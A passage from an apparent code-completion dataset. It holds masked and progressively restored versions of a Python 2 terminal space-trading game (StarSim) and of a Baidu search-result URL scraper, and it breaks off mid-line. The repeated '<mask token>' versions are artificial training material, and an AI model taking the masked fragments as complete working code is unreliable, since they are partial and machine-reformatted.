'2':\n marketMenu(player, planet)\n elif userinput == '3':\n planet = spacePortMenu(player, planet)\n else:\n notFinished = False\n\n\n<mask token>\n",
"step-3": "<mask token>\nturnCounter = 0\n\n\ndef cleanScreen():\n for i in range(0, 50):\n print('')\n\n\ndef spacePirates(player):\n while True:\n cleanScreen()\n print('*****F*U*C*K****S*P*A*C*E*P*I*R*A*T*E*S***A*T*T*A*C*K*****')\n playerFirepower = player.getTotalFirepower()\n piratesFirepower = int(playerFirepower * (1 + random.randint(-20, \n 20) / 100))\n if random.randint(0, playerFirepower\n ) > playerFirepower / 3 and random.randint(0, piratesFirepower\n ) < piratesFirepower / 3 or playerFirepower == 0:\n print('Damm, you got robbed by the pirates!')\n print('You lost all your cargo and half your money!')\n player.clearTech()\n player.clearFood()\n player.updateCargoUnits()\n player.setCredits(player.getCredits() / 2)\n else:\n print('Lucky you! Your fighters drove them off!')\n print('**********************************************************')\n input('Hit enter to continue')\n break\n\n\ndef shipyardMenu(player, planet):\n while True:\n cleanScreen()\n print('*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****')\n player.printStats()\n print('**********************************************************')\n shipList = planet.getShipyard()\n print('Available Ships:')\n print('**********************************************************')\n i = 0\n for s in shipList:\n print('Nr.:' + str(i) + ':' + s.toString())\n i += 1\n print('**********************************************************')\n userInput = input(\n 'Enter the number you would like to by or x to leave:')\n if userInput == 'x':\n break\n else:\n ui = int(userInput)\n if ui <= i:\n if player.getCredits() > shipList[ui].getPrice():\n if type(shipList[ui]) == FighterShip:\n player.addFighterShip(shipList[ui])\n player.updateFirePower()\n else:\n player.addCargoShip(shipList[ui])\n player.updateCargoUnits()\n player.setCredits(player.getCredits() - shipList[ui].\n getPrice())\n player.updateMaintenance()\n del shipList[ui]\n else:\n print('wrong number, try again ....')\n\n\ndef spacePortMenu(player, planet):\n global turnCounter\n while True:\n cleanScreen()\n print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')\n print('Enter 1 to jump to a agri planet (risk 5%)')\n print('Enter 2 to jump to a tech planet (risk 10%)')\n print('Enter 3 to jump to a war planet (risk 20%)')\n userInput = input('Or enter x to exit:')\n risk = 0\n if userInput == 'x':\n return planet\n elif userInput == '1':\n risk = 5\n elif userInput == '2':\n risk = 10\n else:\n risk = 20\n if random.randint(0, 100) <= risk:\n spacePirates(player)\n player.setCredits(player.getCredits() - player.getTotalMaintenance())\n turnCounter += 1\n return Planet.Planet(int(userInput))\n\n\ndef marketMenu(player, planet):\n while True:\n cleanScreen()\n print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')\n player.printStats()\n print('**********************************************************')\n market = planet.getMarket()\n print('Price for Food = ', market['Food'])\n print('Price for Tech = ', market['Tech'])\n print('**********************************************************')\n userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')\n str = ''\n if userInput == '1':\n str = 'Food'\n elif userInput == '2':\n str = 'Tech'\n else:\n break\n print('**********************************************************')\n max = 0\n if market[str] * player.freeCargoUnits <= player.getCredits():\n max = player.freeCargoUnits\n else:\n max = int(player.getCredits() / market[str])\n print('Price for ' + str + ' = ', market[str])\n secondInput = input(\n 'Would you like to buy (enter b) or sell (enter s)?')\n if secondInput == 'b':\n print('You can buy a maximum of', max, 'units')\n nr = input('How much would you like to buy? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if player.getCredits() > market[str] * nr and nr <= max:\n if str == 'Food':\n player.addFood(nr)\n else:\n player.addTech(nr)\n player.setCredits(player.getCredits() - market[str] * nr)\n player.updateCargoUnits()\n elif str == 'Food':\n print('You can sell a maximum of', player.getFood(), 'food units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getFood():\n player.sellFood(nr)\n player.setCredits(player.getCredits() + nr * market['Food']\n )\n else:\n print('You can sell a maximum of', player.getTech(), 'tech units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getTech():\n player.sellTech(nr)\n player.setCredits(player.getCredits() + nr * market['Tech']\n )\n\n\ndef menu(player):\n global turnCounter\n notFinished = True\n planet = Planet.Planet(random.randint(1, 3))\n while notFinished:\n cleanScreen()\n if player.getCredits() < 0:\n print(\n 'Sorry, but you ran out of credits and therefore lost the game in round,'\n , turnCounter, '!')\n break\n print('**********************************************************')\n print('Turn nr.', turnCounter,\n 'in this glorious space trading simulation')\n player.printStats()\n print('**********************************************************')\n print('You are on Planet:', planet.getName())\n print('**********************************************************')\n print('Enter 1 to go to the shipyard')\n print('Enter 2 to go to the market')\n print('Enter 3 to go to the spaceport')\n print('Enter exit to leave the game')\n userinput = input('Your Input:')\n if userinput == '1':\n shipyardMenu(player, planet)\n elif userinput == '2':\n marketMenu(player, planet)\n elif userinput == '3':\n planet = spacePortMenu(player, planet)\n else:\n notFinished = False\n\n\nprint('***************************************')\nprint(' Welcome to StarSim')\nprint('***************************************')\nname = input('Please enter your Name:')\nplayer = Player.Player(name)\nmenu(player)\n",
"step-4": "<mask token>\nimport Ship\nimport Player\nimport Planet\nimport random\nfrom FighterShip import FighterShip\nturnCounter = 0\n\n\ndef cleanScreen():\n for i in range(0, 50):\n print('')\n\n\ndef spacePirates(player):\n while True:\n cleanScreen()\n print('*****F*U*C*K****S*P*A*C*E*P*I*R*A*T*E*S***A*T*T*A*C*K*****')\n playerFirepower = player.getTotalFirepower()\n piratesFirepower = int(playerFirepower * (1 + random.randint(-20, \n 20) / 100))\n if random.randint(0, playerFirepower\n ) > playerFirepower / 3 and random.randint(0, piratesFirepower\n ) < piratesFirepower / 3 or playerFirepower == 0:\n print('Damm, you got robbed by the pirates!')\n print('You lost all your cargo and half your money!')\n player.clearTech()\n player.clearFood()\n player.updateCargoUnits()\n player.setCredits(player.getCredits() / 2)\n else:\n print('Lucky you! Your fighters drove them off!')\n print('**********************************************************')\n input('Hit enter to continue')\n break\n\n\ndef shipyardMenu(player, planet):\n while True:\n cleanScreen()\n print('*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****')\n player.printStats()\n print('**********************************************************')\n shipList = planet.getShipyard()\n print('Available Ships:')\n print('**********************************************************')\n i = 0\n for s in shipList:\n print('Nr.:' + str(i) + ':' + s.toString())\n i += 1\n print('**********************************************************')\n userInput = input(\n 'Enter the number you would like to by or x to leave:')\n if userInput == 'x':\n break\n else:\n ui = int(userInput)\n if ui <= i:\n if player.getCredits() > shipList[ui].getPrice():\n if type(shipList[ui]) == FighterShip:\n player.addFighterShip(shipList[ui])\n player.updateFirePower()\n else:\n player.addCargoShip(shipList[ui])\n player.updateCargoUnits()\n player.setCredits(player.getCredits() - shipList[ui].\n getPrice())\n player.updateMaintenance()\n del shipList[ui]\n else:\n print('wrong number, try again ....')\n\n\ndef spacePortMenu(player, planet):\n global turnCounter\n while True:\n cleanScreen()\n print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')\n print('Enter 1 to jump to a agri planet (risk 5%)')\n print('Enter 2 to jump to a tech planet (risk 10%)')\n print('Enter 3 to jump to a war planet (risk 20%)')\n userInput = input('Or enter x to exit:')\n risk = 0\n if userInput == 'x':\n return planet\n elif userInput == '1':\n risk = 5\n elif userInput == '2':\n risk = 10\n else:\n risk = 20\n if random.randint(0, 100) <= risk:\n spacePirates(player)\n player.setCredits(player.getCredits() - player.getTotalMaintenance())\n turnCounter += 1\n return Planet.Planet(int(userInput))\n\n\ndef marketMenu(player, planet):\n while True:\n cleanScreen()\n print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')\n player.printStats()\n print('**********************************************************')\n market = planet.getMarket()\n print('Price for Food = ', market['Food'])\n print('Price for Tech = ', market['Tech'])\n print('**********************************************************')\n userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')\n str = ''\n if userInput == '1':\n str = 'Food'\n elif userInput == '2':\n str = 'Tech'\n else:\n break\n print('**********************************************************')\n max = 0\n if market[str] * player.freeCargoUnits <= player.getCredits():\n max = player.freeCargoUnits\n else:\n max = int(player.getCredits() / market[str])\n print('Price for ' + str + ' = ', market[str])\n secondInput = input(\n 'Would you like to buy (enter b) or sell (enter s)?')\n if secondInput == 'b':\n print('You can buy a maximum of', max, 'units')\n nr = input('How much would you like to buy? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if player.getCredits() > market[str] * nr and nr <= max:\n if str == 'Food':\n player.addFood(nr)\n else:\n player.addTech(nr)\n player.setCredits(player.getCredits() - market[str] * nr)\n player.updateCargoUnits()\n elif str == 'Food':\n print('You can sell a maximum of', player.getFood(), 'food units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getFood():\n player.sellFood(nr)\n player.setCredits(player.getCredits() + nr * market['Food']\n )\n else:\n print('You can sell a maximum of', player.getTech(), 'tech units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getTech():\n player.sellTech(nr)\n player.setCredits(player.getCredits() + nr * market['Tech']\n )\n\n\ndef menu(player):\n global turnCounter\n notFinished = True\n planet = Planet.Planet(random.randint(1, 3))\n while notFinished:\n cleanScreen()\n if player.getCredits() < 0:\n print(\n 'Sorry, but you ran out of credits and therefore lost the game in round,'\n , turnCounter, '!')\n break\n print('**********************************************************')\n print('Turn nr.', turnCounter,\n 'in this glorious space trading simulation')\n player.printStats()\n print('**********************************************************')\n print('You are on Planet:', planet.getName())\n print('**********************************************************')\n print('Enter 1 to go to the shipyard')\n print('Enter 2 to go to the market')\n print('Enter 3 to go to the spaceport')\n print('Enter exit to leave the game')\n userinput = input('Your Input:')\n if userinput == '1':\n shipyardMenu(player, planet)\n elif userinput == '2':\n marketMenu(player, planet)\n elif userinput == '3':\n planet = spacePortMenu(player, planet)\n else:\n notFinished = False\n\n\nprint('***************************************')\nprint(' Welcome to StarSim')\nprint('***************************************')\nname = input('Please enter your Name:')\nplayer = Player.Player(name)\nmenu(player)\n",
"step-5": "'''\nCreated on 17.05.2018\n\n@author: markus\n'''\nimport Ship\nimport Player\nimport Planet\nimport random\nfrom FighterShip import FighterShip\n\nturnCounter = 0\n\ndef cleanScreen():\n for i in range(0,50):\n print(\"\")\n \ndef spacePirates(player):#space prites attack, their firepower is +/-20% of player firepower\n while True:# loop\n cleanScreen()\n print(\"*****F*U*C*K****S*P*A*C*E*P*I*R*A*T*E*S***A*T*T*A*C*K*****\")\n playerFirepower = player.getTotalFirepower()\n piratesFirepower = int(playerFirepower*(1+random.randint(-20,20)/100))\n if ((random.randint(0,playerFirepower) > playerFirepower/3) and \n (random.randint(0,piratesFirepower) < piratesFirepower/3) or (playerFirepower == 0)):\n print(\"Damm, you got robbed by the pirates!\")\n print(\"You lost all your cargo and half your money!\")\n player.clearTech()\n player.clearFood()\n player.updateCargoUnits()\n player.setCredits(player.getCredits()/2)\n else:\n print(\"Lucky you! Your fighters drove them off!\")\n print(\"**********************************************************\")\n input(\"Hit enter to continue\")\n break\n \n\ndef shipyardMenu(player, planet):\n while True:# loop\n cleanScreen()\n print(\"*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****\")\n player.printStats()\n print(\"**********************************************************\")\n shipList = planet.getShipyard()\n print(\"Available Ships:\")\n print(\"**********************************************************\")\n i = 0\n for s in shipList:\n print(\"Nr.:\"+str(i)+\":\"+s.toString())\n i += 1\n print(\"**********************************************************\") \n userInput = input(\"Enter the number you would like to by or x to leave:\") \n if (userInput == \"x\"):\n break;\n else:\n ui = int(userInput)\n if (ui <= i):\n if(player.getCredits() > shipList[ui].getPrice()): #has enough money\n if(type(shipList[ui]) == FighterShip):\n player.addFighterShip(shipList[ui])\n player.updateFirePower()\n else:\n player.addCargoShip(shipList[ui])\n player.updateCargoUnits()\n player.setCredits(player.getCredits() - shipList[ui].getPrice())\n player.updateMaintenance()\n del shipList[ui]\n else:\n print(\"wrong number, try again ....\")\n\ndef spacePortMenu(player, planet):\n global turnCounter\n while True:# loop\n cleanScreen()\n print(\"****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****\")\n print(\"Enter 1 to jump to a agri planet (risk 5%)\")\n print(\"Enter 2 to jump to a tech planet (risk 10%)\")\n print(\"Enter 3 to jump to a war planet (risk 20%)\")\n userInput = input(\"Or enter x to exit:\")\n risk = 0\n if (userInput == \"x\"):\n return planet\n elif (userInput == \"1\"):\n risk = 5\n elif(userInput == \"2\"):\n risk = 10\n else:\n risk = 20 \n if (random.randint(0,100) <= risk):\n spacePirates(player)\n player.setCredits(player.getCredits() - player.getTotalMaintenance())\n turnCounter += 1 \n return Planet.Planet(int(userInput))\n \ndef marketMenu(player, planet):\n while True:# loop\n cleanScreen()\n print(\"*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******\")\n player.printStats()\n print(\"**********************************************************\")\n market = planet.getMarket()\n print(\"Price for Food = \",market[\"Food\"])\n print(\"Price for Tech = \",market[\"Tech\"])\n print(\"**********************************************************\")\n userInput = input(\"Enter 1 for Food, 2 for Tech or x for exit:\")\n str =\"\"\n if (userInput == \"1\"):\n str = \"Food\"\n elif(userInput == \"2\"):\n str= \"Tech\"\n else:\n break\n print(\"**********************************************************\")\n max = 0\n if(market[str]*player.freeCargoUnits <= player.getCredits()):#enough credit?\n max = player.freeCargoUnits\n else:\n max = int(player.getCredits()/market[str])\n print(\"Price for \"+str+\" = \",market[str])\n secondInput = input(\"Would you like to buy (enter b) or sell (enter s)?\")\n if (secondInput == \"b\"):#buying\n print(\"You can buy a maximum of\",max,\"units\")\n nr = input(\"How much would you like to buy? Or press x to exit\")\n if (nr == \"x\"):\n pass\n else:\n nr = int(nr)\n if((player.getCredits() > market[str]*nr) and (nr <= max)): #has enough money and space\n if (str == \"Food\"):\n player.addFood(nr)\n else:\n player.addTech(nr)\n player.setCredits(player.getCredits() - market[str]*nr)\n player.updateCargoUnits()\n else:#selling\n if (str == \"Food\"):\n print(\"You can sell a maximum of\",player.getFood(),\"food units\")\n nr = input(\"How much would you like to sell? Or press x to exit\")\n if (nr == \"x\"):\n pass\n else:\n nr = int(nr)\n if (nr <= player.getFood()):\n player.sellFood(nr)\n player.setCredits(player.getCredits() + nr*market[\"Food\"])\n else:\n print(\"You can sell a maximum of\",player.getTech(),\"tech units\")\n nr = input(\"How much would you like to sell? Or press x to exit\")\n if (nr == \"x\"):\n pass\n else:\n nr = int(nr)\n if (nr <= player.getTech()):\n player.sellTech(nr)\n player.setCredits(player.getCredits() + nr*market[\"Tech\"])\n \n \n \n \ndef menu(player):\n global turnCounter\n notFinished = True\n planet = Planet.Planet(random.randint(1,3))\n while notFinished:#main game loop \n cleanScreen()\n if (player.getCredits() < 0):\n print(\"Sorry, but you ran out of credits and therefore lost the game in round,\",turnCounter,\"!\")\n break\n print(\"**********************************************************\")\n print(\"Turn nr.\",turnCounter,\"in this glorious space trading simulation\")\n player.printStats()\n print(\"**********************************************************\")\n print(\"You are on Planet:\",planet.getName())\n print(\"**********************************************************\")\n print(\"Enter 1 to go to the shipyard\")\n print(\"Enter 2 to go to the market\")\n print(\"Enter 3 to go to the spaceport\")\n print(\"Enter exit to leave the game\")\n userinput = input(\"Your Input:\")\n if (userinput == \"1\"):\n shipyardMenu(player, planet)\n elif (userinput == \"2\"):\n marketMenu(player, planet)\n elif (userinput == \"3\"):\n planet = spacePortMenu(player, planet)\n else: \n notFinished = False\n \n \n \n\nprint(\"***************************************\")\nprint(\" Welcome to StarSim\")\nprint(\"***************************************\")\nname = input(\"Please enter your Name:\")\nplayer = Player.Player(name)\nmenu(player)\n\n\n\n\n\n",
"step-ids": [
2,
5,
8,
9,
10
]
}
|
[
2,
5,
8,
9,
10
] |
# -*- coding: utf-8 -*-
# Project = https://github.com/super-l/search-url.git
# Author = superl
# Blog = www.superl.org QQ:86717375
# Team = Code Security Team(C.S.T) | 铭剑创鼎
import urllib2
import re
import ConfigParser
from lib.filter import *
from lib.getdata import *
from lib.count import *
from lib.status import *
class Baidu():
baidu_page_size = 50
search_name = '[baidu]'
def __init__(self,count) :
cfg = ConfigParser.ConfigParser()
cfg.read("config/setting.conf")
self.baidu_page_size = int(cfg.get("search", "baidu_page_size"))
self.savefile = cfg.get("global", "savefile")
self.write_title = cfg.get("log", "write_title")
self.write_name = cfg.get("log", "write_name")
self.my_filter = SupFilter()
self.my_data = SupGetData()
self.my_status = Supstatus()
self.count = count
#Get the web page source code
def search(self,key,page_pn):
#The number of baidu pages currently viewed
#page_num = page_pn/baidu_page_size
page_num = str(page_pn/self.baidu_page_size+1)
search_url = 'http://www.baidu.com/s?wd=key&rn='+str(self.baidu_page_size)+'&pn='+str(page_pn)
search_url = search_url.replace('key',key)
#print search_url
htmlcontent = self.my_data.get_pagehtml(search_url,'baidu')
regex_page = r'<span class="pc">'+page_num+'</span>'
page_compile = re.compile(regex_page)
page_result = page_compile.findall(htmlcontent)
if page_result:
pass
else:
self.my_status.baidu_search = False
return
regex_titleurl = r'<div class="result c-container ".*<h3 class=".*"><a(?:[^\<]*\n[^\<]*)href = "(?P<url>.+?)"(?:[^\<]*\n[^\<]*)target="_blank"(?:[^\<]*\n[^\<]*)>(?P<title>.+?)</a></h3>'
content = re.compile(regex_titleurl)
find_result = content.findall(htmlcontent)
print ("\033[1;37;40m==========================百度 第%s页采集开始================\n"%(page_num))
if self.savefile == 'True':
logfile = open(key+'.txt','a')
for i in range(len(find_result)):
dr = re.compile(r'<[^>]+>',re.S)
title = dr.sub('',find_result[i][1])
realurl = self.my_data.get_baidu_realurl(find_result[i][0])
self.count.all_totals+=1
realurl = self.my_filter.filter_data(realurl,title)
if realurl != "filter":
self.count.all_checked_totals+=1
print ("[ID]:%d [URL]:%s [TITLE]:%s"%(i,realurl,title))
if self.savefile == 'True':
have_url = 0
with open(key+'.txt','r') as foo:
for line in foo.readlines():
if realurl in line:
have_url = 1
if have_url ==0:
if self.write_title:
if self.write_name:
logfile.write(self.search_name+realurl+' '+title+'\n')
else:
logfile.write(realurl+' '+title+'\n')
else:
if self.write_name:
logfile.write(self.search_name+realurl+'\n')
else:
logfile.write(realurl+'\n')
else:
self.count.all_delete_totals+=1
else:
self.count.all_filter_totals+=1
if self.savefile == 'True':
logfile.close()
print ("==========================百度 第%s页采集结束================\n"%(page_num))
|
normal
|
{
"blob_id": "b724b04c6303cc9021539ad7df5a198000491029",
"index": 5436,
"step-1": "<mask token>\n\n\nclass Baidu:\n <mask token>\n <mask token>\n\n def __init__(self, count):\n cfg = ConfigParser.ConfigParser()\n cfg.read('config/setting.conf')\n self.baidu_page_size = int(cfg.get('search', 'baidu_page_size'))\n self.savefile = cfg.get('global', 'savefile')\n self.write_title = cfg.get('log', 'write_title')\n self.write_name = cfg.get('log', 'write_name')\n self.my_filter = SupFilter()\n self.my_data = SupGetData()\n self.my_status = Supstatus()\n self.count = count\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Baidu:\n <mask token>\n <mask token>\n\n def __init__(self, count):\n cfg = ConfigParser.ConfigParser()\n cfg.read('config/setting.conf')\n self.baidu_page_size = int(cfg.get('search', 'baidu_page_size'))\n self.savefile = cfg.get('global', 'savefile')\n self.write_title = cfg.get('log', 'write_title')\n self.write_name = cfg.get('log', 'write_name')\n self.my_filter = SupFilter()\n self.my_data = SupGetData()\n self.my_status = Supstatus()\n self.count = count\n\n def search(self, key, page_pn):\n page_num = str(page_pn / self.baidu_page_size + 1)\n search_url = 'http://www.baidu.com/s?wd=key&rn=' + str(self.\n baidu_page_size) + '&pn=' + str(page_pn)\n search_url = search_url.replace('key', key)\n htmlcontent = self.my_data.get_pagehtml(search_url, 'baidu')\n regex_page = '<span class=\"pc\">' + page_num + '</span>'\n page_compile = re.compile(regex_page)\n page_result = page_compile.findall(htmlcontent)\n if page_result:\n pass\n else:\n self.my_status.baidu_search = False\n return\n regex_titleurl = (\n '<div class=\"result c-container \".*<h3 class=\".*\"><a(?:[^\\\\<]*\\\\n[^\\\\<]*)href = \"(?P<url>.+?)\"(?:[^\\\\<]*\\\\n[^\\\\<]*)target=\"_blank\"(?:[^\\\\<]*\\\\n[^\\\\<]*)>(?P<title>.+?)</a></h3>'\n )\n content = re.compile(regex_titleurl)\n find_result = content.findall(htmlcontent)\n print(\n '\\x1b[1;37;40m==========================百度 第%s页采集开始================\\n'\n % page_num)\n if self.savefile == 'True':\n logfile = open(key + '.txt', 'a')\n for i in range(len(find_result)):\n dr = re.compile('<[^>]+>', re.S)\n title = dr.sub('', find_result[i][1])\n realurl = self.my_data.get_baidu_realurl(find_result[i][0])\n self.count.all_totals += 1\n realurl = self.my_filter.filter_data(realurl, title)\n if realurl != 'filter':\n self.count.all_checked_totals += 1\n print('[ID]:%d [URL]:%s [TITLE]:%s' % (i, realurl, title))\n if self.savefile == 'True':\n have_url = 0\n with open(key + '.txt', 'r') as foo:\n for line in foo.readlines():\n if realurl in line:\n have_url = 1\n if have_url == 0:\n if self.write_title:\n if self.write_name:\n logfile.write(self.search_name +\n realurl + ' ' + title + '\\n')\n else:\n logfile.write(realurl + ' ' + title +\n '\\n')\n elif self.write_name:\n logfile.write(self.search_name + realurl + '\\n'\n )\n else:\n logfile.write(realurl + '\\n')\n else:\n self.count.all_delete_totals += 1\n else:\n self.count.all_filter_totals += 1\n if self.savefile == 'True':\n logfile.close()\n print('==========================百度 第%s页采集结束================\\n' %\n page_num)\n",
"step-3": "<mask token>\n\n\nclass Baidu:\n baidu_page_size = 50\n search_name = '[baidu]'\n\n def __init__(self, count):\n cfg = ConfigParser.ConfigParser()\n cfg.read('config/setting.conf')\n self.baidu_page_size = int(cfg.get('search', 'baidu_page_size'))\n self.savefile = cfg.get('global', 'savefile')\n self.write_title = cfg.get('log', 'write_title')\n self.write_name = cfg.get('log', 'write_name')\n self.my_filter = SupFilter()\n self.my_data = SupGetData()\n self.my_status = Supstatus()\n self.count = count\n\n def search(self, key, page_pn):\n page_num = str(page_pn / self.baidu_page_size + 1)\n search_url = 'http://www.baidu.com/s?wd=key&rn=' + str(self.\n baidu_page_size) + '&pn=' + str(page_pn)\n search_url = search_url.replace('key', key)\n htmlcontent = self.my_data.get_pagehtml(search_url, 'baidu')\n regex_page = '<span class=\"pc\">' + page_num + '</span>'\n page_compile = re.compile(regex_page)\n page_result = page_compile.findall(htmlcontent)\n if page_result:\n pass\n else:\n self.my_status.baidu_search = False\n return\n regex_titleurl = (\n '<div class=\"result c-container \".*<h3 class=\".*\"><a(?:[^\\\\<]*\\\\n[^\\\\<]*)href = \"(?P<url>.+?)\"(?:[^\\\\<]*\\\\n[^\\\\<]*)target=\"_blank\"(?:[^\\\\<]*\\\\n[^\\\\<]*)>(?P<title>.+?)</a></h3>'\n )\n content = re.compile(regex_titleurl)\n find_result = content.findall(htmlcontent)\n print(\n '\\x1b[1;37;40m==========================百度 第%s页采集开始================\\n'\n % page_num)\n if self.savefile == 'True':\n logfile = open(key + '.txt', 'a')\n for i in range(len(find_result)):\n dr = re.compile('<[^>]+>', re.S)\n title = dr.sub('', find_result[i][1])\n realurl = self.my_data.get_baidu_realurl(find_result[i][0])\n self.count.all_totals += 1\n realurl = self.my_filter.filter_data(realurl, title)\n if realurl != 'filter':\n self.count.all_checked_totals += 1\n print('[ID]:%d [URL]:%s [TITLE]:%s' % (i, realurl, title))\n if self.savefile == 'True':\n have_url = 0\n with open(key + '.txt', 'r') as foo:\n for line in foo.readlines():\n if realurl in line:\n have_url = 1\n if have_url == 0:\n if self.write_title:\n if self.write_name:\n logfile.write(self.search_name +\n realurl + ' ' + title + '\\n')\n else:\n logfile.write(realurl + ' ' + title +\n '\\n')\n elif self.write_name:\n logfile.write(self.search_name + realurl + '\\n'\n )\n else:\n logfile.write(realurl + '\\n')\n else:\n self.count.all_delete_totals += 1\n else:\n self.count.all_filter_totals += 1\n if self.savefile == 'True':\n logfile.close()\n print('==========================百度 第%s页采集结束================\\n' %\n page_num)\n",
"step-4": "import urllib2\nimport re\nimport ConfigParser\nfrom lib.filter import *\nfrom lib.getdata import *\nfrom lib.count import *\nfrom lib.status import *\n\n\nclass Baidu:\n baidu_page_size = 50\n search_name = '[baidu]'\n\n def __init__(self, count):\n cfg = ConfigParser.ConfigParser()\n cfg.read('config/setting.conf')\n self.baidu_page_size = int(cfg.get('search', 'baidu_page_size'))\n self.savefile = cfg.get('global', 'savefile')\n self.write_title = cfg.get('log', 'write_title')\n self.write_name = cfg.get('log', 'write_name')\n self.my_filter = SupFilter()\n self.my_data = SupGetData()\n self.my_status = Supstatus()\n self.count = count\n\n def search(self, key, page_pn):\n page_num = str(page_pn / self.baidu_page_size + 1)\n search_url = 'http://www.baidu.com/s?wd=key&rn=' + str(self.\n baidu_page_size) + '&pn=' + str(page_pn)\n search_url = search_url.replace('key', key)\n htmlcontent = self.my_data.get_pagehtml(search_url, 'baidu')\n regex_page = '<span class=\"pc\">' + page_num + '</span>'\n page_compile = re.compile(regex_page)\n page_result = page_compile.findall(htmlcontent)\n if page_result:\n pass\n else:\n self.my_status.baidu_search = False\n return\n regex_titleurl = (\n '<div class=\"result c-container \".*<h3 class=\".*\"><a(?:[^\\\\<]*\\\\n[^\\\\<]*)href = \"(?P<url>.+?)\"(?:[^\\\\<]*\\\\n[^\\\\<]*)target=\"_blank\"(?:[^\\\\<]*\\\\n[^\\\\<]*)>(?P<title>.+?)</a></h3>'\n )\n content = re.compile(regex_titleurl)\n find_result = content.findall(htmlcontent)\n print(\n '\\x1b[1;37;40m==========================百度 第%s页采集开始================\\n'\n % page_num)\n if self.savefile == 'True':\n logfile = open(key + '.txt', 'a')\n for i in range(len(find_result)):\n dr = re.compile('<[^>]+>', re.S)\n title = dr.sub('', find_result[i][1])\n realurl = self.my_data.get_baidu_realurl(find_result[i][0])\n self.count.all_totals += 1\n realurl = self.my_filter.filter_data(realurl, title)\n if realurl != 'filter':\n self.count.all_checked_totals += 1\n print('[ID]:%d [URL]:%s [TITLE]:%s' % (i, realurl, title))\n if self.savefile == 'True':\n have_url = 0\n with open(key + '.txt', 'r') as foo:\n for line in foo.readlines():\n if realurl in line:\n have_url = 1\n if have_url == 0:\n if self.write_title:\n if self.write_name:\n logfile.write(self.search_name +\n realurl + ' ' + title + '\\n')\n else:\n logfile.write(realurl + ' ' + title +\n '\\n')\n elif self.write_name:\n logfile.write(self.search_name + realurl + '\\n'\n )\n else:\n logfile.write(realurl + '\\n')\n else:\n self.count.all_delete_totals += 1\n else:\n self.count.all_filter_totals += 1\n if self.savefile == 'True':\n logfile.close()\n print('==========================百度 第%s页采集结束================\\n' %\n page_num)\n",
"step-5": "# -*- coding: utf-8 -*-\n# Project = https://github.com/super-l/search-url.git\n# Author = superl\n# Blog = www.superl.org QQ:86717375\n# Team = Code Security Team(C.S.T) | 铭剑创鼎\nimport urllib2\nimport re \nimport ConfigParser\n\nfrom lib.filter import *\nfrom lib.getdata import *\nfrom lib.count import *\nfrom lib.status import *\n\nclass Baidu():\n\n baidu_page_size = 50\n search_name = '[baidu]'\n\n def __init__(self,count) :\n cfg = ConfigParser.ConfigParser()\n cfg.read(\"config/setting.conf\")\n\n self.baidu_page_size = int(cfg.get(\"search\", \"baidu_page_size\"))\n self.savefile = cfg.get(\"global\", \"savefile\")\n self.write_title = cfg.get(\"log\", \"write_title\")\n self.write_name = cfg.get(\"log\", \"write_name\")\n self.my_filter = SupFilter()\n self.my_data = SupGetData()\n self.my_status = Supstatus()\n self.count = count\n\n\n #Get the web page source code\n def search(self,key,page_pn):\n #The number of baidu pages currently viewed\n #page_num = page_pn/baidu_page_size\n page_num = str(page_pn/self.baidu_page_size+1)\n\n search_url = 'http://www.baidu.com/s?wd=key&rn='+str(self.baidu_page_size)+'&pn='+str(page_pn)\n search_url = search_url.replace('key',key)\n #print search_url\n htmlcontent = self.my_data.get_pagehtml(search_url,'baidu')\n\n regex_page = r'<span class=\"pc\">'+page_num+'</span>'\n page_compile = re.compile(regex_page)\n page_result = page_compile.findall(htmlcontent)\n\n if page_result:\n pass\n else:\n self.my_status.baidu_search = False\n return\n\n regex_titleurl = r'<div class=\"result c-container \".*<h3 class=\".*\"><a(?:[^\\<]*\\n[^\\<]*)href = \"(?P<url>.+?)\"(?:[^\\<]*\\n[^\\<]*)target=\"_blank\"(?:[^\\<]*\\n[^\\<]*)>(?P<title>.+?)</a></h3>'\n\n content = re.compile(regex_titleurl)\n find_result = content.findall(htmlcontent)\n\n print (\"\\033[1;37;40m==========================百度 第%s页采集开始================\\n\"%(page_num))\n \n if self.savefile == 'True':\n logfile = open(key+'.txt','a')\n\n for i in range(len(find_result)):\n dr = re.compile(r'<[^>]+>',re.S)\n title = dr.sub('',find_result[i][1])\n\n realurl = self.my_data.get_baidu_realurl(find_result[i][0])\n\n self.count.all_totals+=1\n\n \n realurl = self.my_filter.filter_data(realurl,title)\n\n if realurl != \"filter\":\n self.count.all_checked_totals+=1\n\n print (\"[ID]:%d [URL]:%s [TITLE]:%s\"%(i,realurl,title))\n if self.savefile == 'True':\n have_url = 0\n with open(key+'.txt','r') as foo:\n for line in foo.readlines():\n if realurl in line:\n have_url = 1\n if have_url ==0:\n if self.write_title:\n if self.write_name:\n logfile.write(self.search_name+realurl+' '+title+'\\n')\n else:\n logfile.write(realurl+' '+title+'\\n')\n else:\n if self.write_name:\n logfile.write(self.search_name+realurl+'\\n')\n else:\n logfile.write(realurl+'\\n')\n else:\n self.count.all_delete_totals+=1 \n else:\n self.count.all_filter_totals+=1\n if self.savefile == 'True': \n logfile.close() \n print 